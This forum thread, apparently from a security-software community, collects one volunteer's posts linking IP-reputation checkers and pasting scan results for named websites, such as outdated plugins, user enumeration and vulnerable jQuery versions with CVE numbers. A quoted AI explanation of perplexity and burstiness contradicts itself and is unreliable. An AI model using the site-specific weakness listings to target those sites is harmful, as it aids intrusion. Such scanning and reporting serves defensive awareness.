the one of contacts scanned with truspilot:
https://www.trustpilot.com/review/tradepub.com

Found to be safe: https://check.trendmicro.com/page/QuickStart?s=agrdy.com

Avast Online extension detect tracking:
Ad-tracking 1 detected
Webanalysis 1 detected

Also see: https://www.shodan.io/domain/www.tradepub.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2023, 04:41:51 PM
Not malicious as such, but Word Press website with 5 vulnerabilities:

https://urlscan.io/result/a35090de-1468-4b6c-abff-e0bc60b85568/

Word Press CMS outdated, outdated plug-ins:
   contact-form-7 5.7.4   Warning   latest release (5.7.5.1)
https://contactform7.com/  &  ordpress-seo 20.2   Warning   latest release (20.5)
https://yoa.st/1uj

User Enumeration is not set to disabled.

Not flagged here: https://www.virustotal.com/gui/url/07d830d285a2eefc2c79496894e312b559aa8076ead43f87bf2e83c2d60b8f10?nocache=1

polonus


Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2023, 09:32:52 PM
Analysis of a website could hint at possible vulnerabilities,
see following scenario, that got me aware of a potential XSS flaw.

I checked and scanned this particular site at https://urlscan.io/ here:
https://urlscan.io/result/7d2197aa-190e-4d94-b841-fa87807f5516/
and then stumbled at the following cookie via: https://urlscan.io/result/7d2197aa-190e-4d94-b841-fa87807f5516/#behaviour

This website could be open to an XSS attack, read
: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1729
because of the       -savelife.in.ua/   1970-01-20
11:57:49   Name: AWSALBCORS cookie  (and what change should be applied to prevent this)

polonus (3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 12:05:55 PM
Fraudulous IP check - below zero is better.

Example: https://www.ip-lookup.org/score/151.101.193.69

A fraud score of 15, certainly too much (check through Netcraft extension and Shodan as well)
https://scamalytics.com/ip/65.55.252.93

Not only for checking IP: https://www.abuseipdb.com/check?query=https%3A%2F%2Fwww.timeloopsolution.com%2F

Another checker: https://www.abuseipdb.com/check?query=https%3A%2F%2Fwww.timeloopsolution.com%2F

Re: https://www.ipvoid.com/ip-blacklist-check/

And detecting those that wanna stay under the detection radar:
Read: https://medium.com/@xianghangmi/resident-evil-understanding-residential-ip-proxy-as-a-dark-service-dea9010a0e29

Use:https://intelx.io/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 01:32:44 PM
Here we have a potntially malicious or suspicious IP address:
https://www.virustotal.com/gui/ip-address/46.173.84.81

See: https://www.abuseipdb.com/check/46.173.84.81

from: https://sitereport.netcraft.com/?url=http://46.173.84.81

1 to detect.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 10:25:20 PM
Establishing vulnerabiliteis on a particular website with asserted IP abuse.

Compare various scan results:

https://www.abuseipdb.com/check/46.149.182.124  (random example)
Re: https://www.shodan.io/host/46.149.176.5  (with all vuln. given there )  on that Apache HTTP-server *

No threat in data exchanges - 3 trackers blocked - No restrictions found.

Missing intermediate TLS certificate   running on  Apache 2.4.41, Ubuntu *

CMS: WordPress 6.2.1

Powered by: Unknown  - 4 Word Press issues -

1. outdated CMS,

2.   Plugin   Update Status   About
woocommerce 7.3.0   Warning   latest release (7.7.0)
hxtps://woocommerce.com/

3. 4. User enumeration and directory listing not set at disabled.

Further website config issues
Quote
Protection
No website application firewall detected.
Please install a cloud-based WAF to prevent website hacks and DDoS attacks.

Security Headers
Missing security header for ClickJacking Protection. Alternatively,
you can use Content-Security-Policy: frame-ancestors 'none'.

Missing security header to prevent Content Type sniffing.

Missing Strict-Transport-Security security header.

Missing Content-Security-Policy directive. We recommend to add the following CSP directives
(you can use default-src if all values are the same): script-src, object-src, base-uri, frame-src

Default server banners displayed. Your site is displaying your web server default banners.

quote-info from a sucuri website scan result.

Sytange as here IP is given as above board: https://www.ip-lookup.org/score/46.149.176.5

Another source to check with - 4 detect: https://www.criminalip.io/en/asset/report/209.97.181.37

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 20, 2023, 05:15:08 PM
Under attack - https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/

IP flagged here: https://www.abuseipdb.com/check/45.146.165.91

Various rsources will give insights in the actual threat theatre.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 03, 2023, 02:32:14 PM
Test your browser here for CSS Exfil Vulnerabilities:
https://www.mike-gualtieri.com/css-exfil-vulnerability-tester

Protect your browser with an extension:
https://chrome.google.com/webstore/detail/css-exfil-protection/ibeemfhcbbikonfajhamlkdgedmekifo

When on firefox: https://addons.mozilla.org/en-US/firefox/addon/css-exfil-protection/

With the upcoming CSS scanning of everybody online,
certainly worth protecting yourself as best you can,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2023, 01:14:17 PM
Ad tracking link being blocked on:
htxps://thebakermama.com/wp-content/
-> following JS link: hxtps://static.cloudflareinsights.com/beacon.min.js/v52afc6f149f6479b8c77fa569edb01181681764108816

Also: https://urlscan.io/result/5b385e2c-bd39-48dd-92be-0bd87f9c8280/

Privacy badger blocks 4 trackers. Site = Yoast SEO plug-in optimalized.

We are strongly advide by Dr.Web's against visiting:
-aax.amazon-adsystem.com listed at:
https://urlscan.io/result/5b385e2c-bd39-48dd-92be-0bd87f9c8280/#indicators

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2023, 03:12:18 PM
Checking on payload delivery example where we found it-> https://urlhaus.abuse.ch/url/2671474/
Re: https://www.virustotal.com/gui/file/4293c1d8574dc87c58360d6bac3daa182f64f7785c9d41da5e0741d2b1817fc7/detection/f-4293c1d

Re: https://www.abuseipdb.com/check/117.219.113.72

and https://www.shodan.io/search?query=bsnl.in

Then we could meet here with these MikroTik-router-OS-vulnerabilities:
https://cyber.vumetric.com/vulns/mikrotik/routeros/6-39-2/

e.c. a crashdump of one mentioned: https://github.com/cq674350529/pocs_slides/blob/master/advisory/MikroTik/CVE-2022-45315/README.md

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 28, 2023, 06:58:36 PM
You would not expect to find following vulnerabilities on such a website like eff dot org, as mentioned here:

Quote
Retire.js
jquery-ui   1.10.2   Found in -https://www.eff.org/files/js/js_x2A4oj9_rCj5CWR_dGMHrobZW14ZVI9ruZKCDG7yyfM.js _____Vulnerability info:
Low   XSS when refreshing checkboxes if usercontrolled data in labels 2101 CVE-2022-31160   
Medium   CVE-2021-41184 XSS in the `of` option of the `.position()` util   12
Medium   CVE-2021-41183 15284 XSS Vulnerability on text options of jQuery UI datepicker   
Medium   CVE-2021-41182 XSS in the `altField` option of the Datepicker widget   12
Medium   CVE-2022-31160 XSS when refreshing a checkboxradio with an HTML-like initial text label   
jquery.datatables   1.10.18   Found in -https://www.eff.org/files/js/js_Q6bf8MyLqauBH0V6N-qDG8KuvtMOI0HbAR9o9acrMQc.js _____Vulnerability info:
Low   possible XSS 2   
High   prototype pollution 3   
Medium   prototype pollution 4   1
jquery   1.12.4   Found in -https://www.eff.org/files/js/js_qd8BaywA4mj4edyGLb52Px4-BwFqScI7dgPymNmaueA.js _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   

Re also: https://www.shodan.io/search?query=eff.org

Page-, header- and cookie-security: found no best policies implemented for cache-control, csp, search-block-form headers.

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunbter)
Title: Re: Tests and other Media topics
Post by: polonus on June 28, 2023, 10:13:04 PM
Another IP detection here: https://urlscan.io/result/389db7e9-b90a-4bce-acb9-dc6ed2d421af/#indicators

Final url VT (not reflecting it is a parked site (see js file): https://www.virustotal.com/gui/url/ed66488c77223438dbd68d0b4f6ce123e1d75352cadbb7e70997535ba896cebb/details  -> -http://ww1.soureladim.com/js/parking.2.105.7.js

IP blacklisted: https://www.abuseipdb.com/check/199.59.243.223

polonus

Title: Re: Tests and other Media topics
Post by: polonus on July 02, 2023, 03:32:23 PM
Flagged: https://www.abuseipdb.com/check/178.128.165.94  *
Flagged as attack source: https://db-ip.com/178.128.165.94

High Risk: Attack target(s)   Mail, SSH (and other abuse mentioned here *)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2023, 12:30:49 PM
Compare resources to check abuse IPs,

Re: https://ip-sc.net/en/r/82.176.30.210
and at AbuseIPDB.com  both qualify as risk High. https://www.abuseipdb.com/check/82.176.30.210

Another source to check against: https://scamalytics.com/ip/82.176.30.210  Fraud risk - 51%.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2023, 02:53:32 PM
Another resources to check against: https://www.abuseipdb.com/check/94.102.61.22
and also flagged here: https://www.abuseipdb.com/check/94.102.61.22  (flagged as spammer)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2023, 06:54:37 PM
In this way we also get informed about the vulnerabilities that can be abused on a certain IP.

See: https://www.abuseipdb.com/check/128.199.52.45

and see existing vulnerabilities here: https://www.shodan.io/host/128.199.52.45

Also:
nextjs   12.3.4   Found in https://www.digitalocean.com/_next/static/chunks/main-d84ea29d76d456a4.js
also: https://www.shodan.io/search?query=digitalocean.com

Also: https://ipinfo.io/174.138.100.127  (not flagged)

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 13, 2023, 11:51:21 AM
Checking online at SafeToOpen: -http://login.reclamefolder.nl
Results
Quote
Scan date/time:
13/Jul/2023 09:31:53 PM

HTML title:
Foutmelding |   Error

SSL issuer:
R3

SSL validity:
89 days

SSL age:
SSL issued 64 days ago

Favicon:
hxtps://login-static.dpgmedia.net/pip-components/favicon/default-favicon-32x32.png

Downloads:

and

Item   Original   Redirected
URL   -https://login.reclamefolder.nl/     -https://login.reclamefolder.nl/ 
FQDN   -login.reclamefolder.nl    -login.reclamefolder.nl
Domain Name   -login.reclamefolder.nl    -login.reclamefolder.nl
Domain Registration - Expiry      
IP Addr.   131.203.3.211    131.203.3.211
Hosted country   NZ   NZ
   Online source SafeToOpen online scan results.

Checked IP: https://www.shodan.io/host/131.203.3.211

Here it is getting interesting: https://urlscan.io/result/7ca297aa-1fe7-4e4b-b712-9cb5dc6e9840/

So is this extension/online scan site also profiling the end-users that work it?
9 detected files on this IP: https://www.virustotal.com/gui/ip-address/172.67.75.26/detection

Netcraft risk rating 1/10.  Vulnerability in content.js in on website in CLOUD14, San Francisco.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2023, 06:33:29 PM
Test you installed mobile apps for tracking and permissions.

Example: https://reports.exodus-privacy.eu.org/en/reports/org.blokada.alarm/latest/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2023, 02:15:15 PM
IP address vulnerablities and related abuse.

Re: https://www.shodan.io/host/128.199.33.46  (see under general information)

Re: https://www.abuseipdb.com/check/128.199.33.46  (recent reports of abuse)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2023, 04:05:05 PM
Threat resources - example https://otx.alienvault.com/indicator/ip/192.241.201.18

Verify with other resources - also https://www.abuseipdb.com/check/192.241.204.201

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 01, 2023, 11:40:57 AM
Info on abuse IPs: https://www.abuseipdb.com/check/45.95.146.35  (random example)

On IP domain: https://www.shodan.io/search?query=mx.ebrandnews.com

and https://www.shodan.io/host/45.95.146.35

Just go over all the vulnerabilities there.

Just recently patched: https://thehackernews.com/2023/07/gameoverlay-two-severe-linux.html
-> https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability

polonus

Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2023, 01:20:11 PM
Check on: https://www.abuseipdb.com/check/83.8.131.51
also here: https://db-ip.com/83.8.131.51 

(also there this IP-address is given as high risk attack source).

Read on attacks: https://venafi.com/blog/attacks-linux-servers-cloud-rise-ssh-abusing-malware/

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 18, 2023, 03:16:42 PM
Next check against greynoise:
Re: https://www.abuseipdb.com/check/167.71.68.224
and https://viz.greynoise.io/ip/167.71.68.224  verdict malicious.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2023, 02:25:56 PM
Fine resources via https://dnsdumpster.com/  on dns recon
Also read this: https://dnsdumpster.com/footprinting-reconnaissance/

As a cold reconnaisance website security analyst and website error-hunter, I also use these resource instances

What is happening in the EU - official open DNS in the European Union -> https://www.dns0.eu/nl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2023, 12:27:58 PM
Checking on malicious IP, several resources: Recapitulation:
See this resource: https://www.fortypoundhead.com/tools_ipcheck.asp
And mentioned source also reports here: https://www.abuseipdb.com/user/30078 (random example, mind the challenge)
Re: https://www.ipqualityscore.com/ip-reputation-check
Re: https://scamalytics.com/ip  and https://dnschecker.org/ip-blacklist-checker.php
Re: https://talosintelligence.com/reputation_center/
See: https://viz.greynoise.io/ip/167.71.68.224 random example
and of cource VT - https://www.virustotal.com/gui/home/upload

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2023, 05:02:04 PM
More IP resources, translated and leading to Snort, Suricata IP-rules detection base here:
Example: https://www.criminalip.io/asset/report/94.102.61.45
See: https://www.virustotal.com/gui/url/4b18e42419ca1e90b14ec300c4fd582fa97d7d034f41c61bbba41ef2413e4ab8/links
See: https://www.shodan.io/search?query=security.criminalip.com
Re: https://www.abuseipdb.com/check/94.102.61.45

Another example: https://www.criminalip.io/asset/report/202.125.94.71
12 to flag here: https://www.virustotal.com/gui/ip-address/202.125.94.71
Additional: https://www.shodan.io/host/202.125.94.71
IP stems from Indonesia Raja - found here: https://blacklist.3coresec.net/lists/et-open.txt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2023, 04:40:28 PM
Check abuse on a whitelisted cloud-IP: https://www.abuseipdb.com/check/172.71.102.128
Nothing here: https://db-ip.com/172.71.102.128
VT warns for ThreatFox IOCs for 2023-08-22 - according to source ArcSight Threat Intelligence - 1 month ago
IcedID botnet C2 domain (confidence level: 70%) 
Alsso see: https://intelx.io/?s=172.71.1
Risk on the server (6) : https://scamalytics.com/ip/172.71.102.128
Quote
Too bad! The connection with your website is not or insufficiently secured (HTTPS). Therefore information in transit between your website and its visitors is not sufficiently protected against eavesdropping and tampering. You should ask your hosting provider to enable HTTPS and to configure it securely.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2023, 12:35:57 PM
Test example pulsedive - https://pulsedive.com/ioc/snap.licdn.com
Website was blocked by Privacy Badger and uBlock.
Blocked - hXtps://px.ads.linkedin.com/ *
The connection with  thewebsite is not or insufficiently secured.

* see: https://pulsedive.com/indicator/?iid=2650031 -> https://www.shodan.io/host/13.107.42.14
Given as clean: https://www.virustotal.com/gui/url/0c06a12108cebe7ed95771d207a8f1e736d294a1c3c6caf787d1aecdea193bfd/details

Also consider search results here: https://intelx.io/?s=13.107.42.14

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2023, 11:12:46 PM
Cloudflare Radar website scanner - https://radar.cloudflare.com/scan/4920b4b5-185f-4da0-85ef-6961a98bde6f/technology
(random example)
Safe BGP scanner: https://isbgpsafeyet.com/

The AS/BGP Report is calculated for every allocated AS number. The report is updated on a weekly basis,
Example: https://dnslytics.com/bgp/as60144

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2023, 04:01:39 PM
Interesting IP resources: https://www.criminalip.io/asset/report/87.140.39.3 (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 14, 2023, 12:12:45 PM
Enhanced testing for web servers: https://en.internet.nl/article/release-1.8/

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 15, 2023, 01:16:24 PM
Was this post generated by AI? Test: https://www.scribbr.com/ai-detector/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 15, 2023, 05:53:05 PM
What has AI to say about this
Quote
Perplexity and burstiness are two measures used by AI detectors to determine the likelihood of a text being AI-generated.

1. Perplexity: Perplexity is a measure of how well a language model can predict the next word in a sequence of words. It quantifies how "surprised" the model is when encountering the actual next word. Lower perplexity indicates that the model can better predict the next word and understand the context accurately. In the context of AI detectors, if the perplexity of a given text is low, it suggests that the language in the text aligns with what AI models have been trained on, indicating a higher likelihood of being AI-generated.

2. Burstiness: Burstiness refers to the distribution of words or phrases in a text. AI detectors analyze the frequency of words or phrases appearing in short periods of time within the text. If the text exhibits a bursty pattern, meaning it contains repetitions or a sudden high concentration of certain words or phrases, it indicates a higher likelihood of being generated by an AI system. Burstiness occurs because language models often generate text by copying and repeating chunks of text they have seen during the training process.

By combining these two factors, AI detectors can assess the similarity between the analyzed text and the patterns typically generated by AI language models, helping to identify the presence of AI-generated content.

Perplexity refers to how well a language model can predict the next word in a sequence of words. It measures how surprised the model is when it encounters new text. If a text has low perplexity, it means that the language model finds the text more predictable and therefore, potentially more likely to be AI-generated.

Burstiness, on the other hand, refers to the statistical distribution of words in a text. It measures how frequently certain words or phrases occur in a given context. AI-generated text often has low burstiness because the language models tend to generate text that is diverse and less repetitive.

In summary, perplexity and burstiness are metrics that help AI detectors determine the likelihood of a text being AI-generated. Low perplexity and burstiness suggest a higher probability of AI involvement.
  quoted from AI Chat explanation.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 21, 2023, 06:25:47 PM
IP blacklist resources: https://www.abuseipdb.com/check/159.89.170.171
Also found to be blacklisted here: -http://202.38.95.67/sshrawlist.php?ip=159.89.170.171 (not secured as http !)

But no data given here: https://www.projecthoneypot.org/ip_159.89.170.171

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2023, 10:51:41 PM
Here we see the importance of a good ad-blocker to prevent connecting to a PUP-redirect (S.BL.Domain.gen)
on a normally non-malicious website:

Suspicious files and blacklisted links: https://quttera.com/detailed_report/webshopchecker.nl

Given the all green here: https://www.virustotal.com/gui/url/42afdffac58afd83fff298bdfd2e5fb316ad98d9651a320b20145bab2ca892fe

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2023, 10:54:29 PM
Test your adblocker capability here: https://adblock-tester.com/

My score: 100 points out of 100
(11 services, 22 checks)

pol
Title: Re: Tests and other Media topics
Post by: Lano on December 05, 2023, 01:41:59 AM
Thanks pol, same here. :)
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2023, 03:43:13 PM
Another ad block test at Toolz here: https://d3ward.github.io/toolz/adblock.html   (site OK).

But there also are test sites that themselves are being blocked as malicious, see this one :
https://www.virustotal.com/gui/url/5e277db1e13d06cb4b6945270952ca00c034c44b9b88f45c83e8533b93aa4c22
Also see on IP: https://www.shodan.io/host/104.21.94.34 e.g. Cloudflare driven WP site.
But noy all scans agree: https://quttera.com/detailed_report/canyoublockit.com

So on the Interwebz it is not always clear from the start, where eventual malware etc. may raise it's ugly head or may not. ;)

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 02:36:57 PM
Be aware of vulnerabilities.

Where it is being abused: https://www.abuseipdb.com/check/2a00:6020:b098:600:5dc4:7f9a:5d25:7bf

Found on what domain: -https://www.shodan.io/search?query=deutsche-glasfaser.de

Server vulnerabilities there: -https://www.tenable.com/plugins/nessus/172186 Plugins
Nessus 172186
Apache 2.4.x < 2.4.56 Multiple Vulnerabilities   -> -https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

Make above links life whenever being active in research or qualified to do so,

Also links to: -https://www.shodan.io/search?query=bc.googleusercontent.com
Vulnerabilities in Python SMTP 1.4.2 -> -https://security.snyk.io/package/pip/py/1.4.2 (Re-DOS-able).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 03:02:04 PM
I performed a Word Press Security scan here: https://hackertarget.com/wordpress-security-scan/
on Homepage - Die Unbestechlichen -> 10 issues

Outdated CMS version + 8 outdated WP plug-ins.

User enumeration possible.  External links checked against multiple blacklists,

Scan your WP website and feel more secure.

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on December 10, 2023, 03:15:08 PM
I performed a Word Press Security scan here: https://hackertarget.com/wordpress-security-scan/ (https://hackertarget.com/wordpress-security-scan/)
on Homepage - Die Unbestechlichen -> 10 issues

Outdated CMS version + 8 outdated WP plug-ins.

User enumeration possible.  External links checked against multiple blacklists,

Scan your WP website and feel more secure.

pol
Thanks Damien
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/10/14/14/c0l622VmGOc/preview.jpg)
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 04:07:18 PM
You're welcome, bob3160.

Something from Google to be introduced in the European Union = Google Chrome to display "choose your search engine" prompt

Re: https://www.ghacks.net/2023/12/09/google-chrome-to-display-choose-your-search-engine-prompt/

I use DDG and Quant for my search queries - chrome://settings/searchEngines in my browser.
- Avoid to search using www dot oscobo dot com, while Avast flags this engine as unsafe.

I check my English grammar and spelling with Quillbot active (a form of AI).

Have a nice Sunday, Bob,

your avast forum-friend,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 13, 2023, 06:58:23 PM
Abuse and malware launched from IP: https://www.abuseipdb.com/check/115.49.29.141
and https://urlhaus.abuse.ch/url/2740313/

But this scan finds it OK? -> https://db-ip.com/115.49.29.141  (no attack source?).
Neither here: https://www.virustotal.com/gui/url/6eaea1a844d227792c2e4fada54036c9468d8d310bb2a119cddd60d8c72ff348?nocache=1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2023, 02:39:24 PM
Additional resources: https://awebanalysis.com/en/ip-lookup/141.101.76.192/

Because of: https://www.abuseipdb.com/check/141.101.76.199

This while nothing is alerted here: https://www.virustotal.com/gui/url/38635c8db081057bc8f9710ed2c4a7322f336cd2a77daa8ea39450678007c7ea?nocache=1

Word Press users for instance should not assume they are completely secure because they are running Cloudflare's.

Abuse can be performed from all places, also from within the cloud.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2023, 04:05:11 PM
DNS resources, see: https://ipchaxun.com/185.153.133.14/

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2023, 03:04:47 PM
Checking IP against GreyNoise data.
What IP - 69.49.231.8  Found where? https://www.abuseipdb.com/check/69.49.231.8
Results found as malicious SSH worm and SSH bruteforcer: https://viz.greynoise.io/ip/69.49.231.8
Missed here: https://blacklist.myip.ms/69.49.231.8
Detected manyfold: https://www.virustotal.com/gui/url/dbb5203c8034a8229c1ea351312249048f279920eda17737ffa3ddba80a5dae8
IP info: https://www.shodan.io/host/69.49.231.8 - https://ipinfo.io/69.49.231.8
Newfold Digital info: https://www.shodan.io/search?query=69-49-231-8.webhostbox.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 18, 2023, 04:54:32 PM
Interesting IP scan resources: https://www.criminalip.io/asset/report/89.248.163.172
See: https://www.abuseipdb.com/check/89.248.163.172

But also be aware of these results: https://quttera.com/detailed_report/www.criminalip.io

To be combined with this one: https://www.projecthoneypot.org/ip_89.248.163.172  (actually no data on thst one)

And then go here: https://www.shodan.io/host/89.248.163.172  (see all vulnerabilities given there for that particular IP-address).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2023, 10:07:37 PM
Compare various sources for this malicious IP:

https://www.abuseipdb.com/check/146.19.191.205
with the abuse mentioned: https://urlhaus.abuse.ch/url/2743271/
No data yet: https://www.projecthoneypot.org/ip_146.19.191.205
nor here: https://ipaddress.is/146.19.191.222
But here: https://www.criminalip.io/asset/report/146.19.191.205

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2023, 04:45:18 PM
AI driven website scanners. This is what I can quote from Chatbot AI on that issue:
Quote
AI:Hello human,

You:
What website scanners are AI-driven?
AI:There are several website scanners that utilize AI-driven technology to enhance their scanning capabilities. Some popular AI-driven website scanners include:

1. Acunetix: Acunetix is a web vulnerability scanner that uses AI technology to detect and prioritize potential security vulnerabilities on websites.

2. Netsparker: Netsparker is another AI-powered web vulnerability scanner that automatically identifies security flaws in web applications, including cross-site scripting (XSS) and SQL injection vulnerabilities.

3. Detectify: Detectify is a web security scanner that employs AI algorithms to scan websites for security issues, including outdated software, misconfigurations, and vulnerabilities.

4. WebARX: WebARX is a website security platform that utilizes AI to detect and protect against various web-based threats, such as malware infections, brute force attacks, and code injections.

5. Qualys Web Application Scanning (WAS): Qualys WAS is a cloud-based web application scanner that leverages AI and machine learning to identify vulnerabilities and provide detailed reports for remediation.

These are just a few examples of AI-driven website scanners available in the market. It's important to research and evaluate different options to find the one that best suits your specific needs and requirements.

There is a good chance we will see much more and also free AI driven website scanners, just like AI driven website building.
It is a new paradigm, a whole new AI world is dawning on us all,

polonus (volunteer cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2023, 12:56:35 PM
Re: https://www.abuseipdb.com/check/185.167.97.244
Then we find this is a word press site with 2 configuration issues - outdated plug-in
   Plugin   Update Status   About
gutenberg 17.2.0   Warning   latest release (17.3.0)
'-https://github.com/
&
Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

Path Tested   Status
/wp-content/uploads/      enabled
/wp-content/plugins/      disabled

This is OK: console.kamatera.com   hosted at CLOUDWEBMANAGE-EU

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 07, 2024, 10:40:09 PM
Chaos in, chaos out - lot of this on AI search engine komo.ai.
AI needs more time to mature.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 03, 2024, 02:50:20 PM
Compare abuse IPs: https://viz.greynoise.io/ip/5.255.98.23
with https://www.abuseipdb.com/check/5.255.98.23
and: https://www.shodan.io/host/5.255.98.23 

Vulnerabilities? -> https://security.stackexchange.com/questions/256579/any-known-ssh-attacks-vulnerabilities-other-than-brute-force-dictionary-attacks

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2024, 11:29:23 AM
Google Chrome is phasing out their Manifest Version 2
changing for MV3 with ad-blocking restrictions.
This means adblocking will be a harder task in your browser.

Test: https://adblock-tester.com/

Ad-listing differentiation may help.
Use a browser that does not make use of the MV3 extension-API.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 16, 2024, 12:06:11 AM
Warning when entering page: https://webparanoid.com/nl/warning.html#/

Website warned against: wXw.capsolver.com  (fake user reports)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 18, 2024, 09:53:03 PM
Test with Google: https://search.google.com/test/amp/result

Test DNS leaks: https://www.dnsleaktest.com/

Test: https://my-location.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2024, 02:39:34 PM
Check on IP -> https://viz.greynoise.io/ip/196.3.142.1

See: https://www.ipqualityscore.com/ip-reputation-check/lookup/196.3.142.1

See: https://www.shodan.io/host/196.3.142.1

See: https://www.abuseipdb.com/check/196.3.142.1

Stays unrated here: https://scan.safetoopen.com/?id=f312387c11302daf53cb17d2539792b941b42405f42ca6153680343edcca562b

Now 1 vendor to flag: https://www.virustotal.com/gui/url/90ce51471ab9fd1f936269462bd5834b1677a67047d8fa17698afa962e88a104?nocache=1
(had been given the all green 7 years ago).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2024, 12:12:52 AM
Monitoring is an important function for any cloud network:
https://radar.cloudflare.com/scan/2bdd431c-73bb-4570-bda5-777ac35f1215/summary  (random example)

Another test: https://isbgpsafeyet.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 09, 2024, 06:56:54 PM
How are apps tracking you? app tracking transparency:

See per app: https://reports.exodus-privacy.eu.org/en/reports/com.whatsapp/latest/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2024, 02:58:42 PM
IP scans: https://opentip.kaspersky.com/103.140.194.75/?tab=lookup
Re: https://maltiverse.com/ip/103.140.194.120
and https://www.abuseipdb.com/check/103.140.194.75

polonus